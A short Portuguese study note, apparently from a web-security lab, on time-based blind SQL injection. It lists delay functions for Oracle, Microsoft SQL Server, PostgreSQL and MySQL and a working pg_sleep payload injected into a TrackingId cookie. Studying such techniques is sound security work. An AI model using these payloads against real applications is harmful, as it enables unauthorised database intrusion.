-----------------------------------------
\\Blind SQL injection with time delays//

As técnicas não funcionarão como nas injeções anteriores.
    |-> Injeção as cegas..

-----|
'    |
'#   |------> Não será mostrado nada.
'--  |
-----|

Funções utilizadas em diferentes bancos de dados:

Oracle - dbms_pipe.receive_message(('a'),10) 
Microsoft 	WAITFOR DELAY '0:0:10' 
PostgreSQL 	SELECT pg_sleep(10)
MySQL 	SELECT sleep(10) 


Injeção: '|| (SELECT pg_sleep(10))--
    |->> Se a resposta demorar 10 Segundos. Podemos concluir que a aplicação é vulnerável.
    
Cookie: TrackingId=F37SDfA6MFWCM0P2'|| (SELECT pg_sleep(10))--

Vamos abrir o BurpSuite

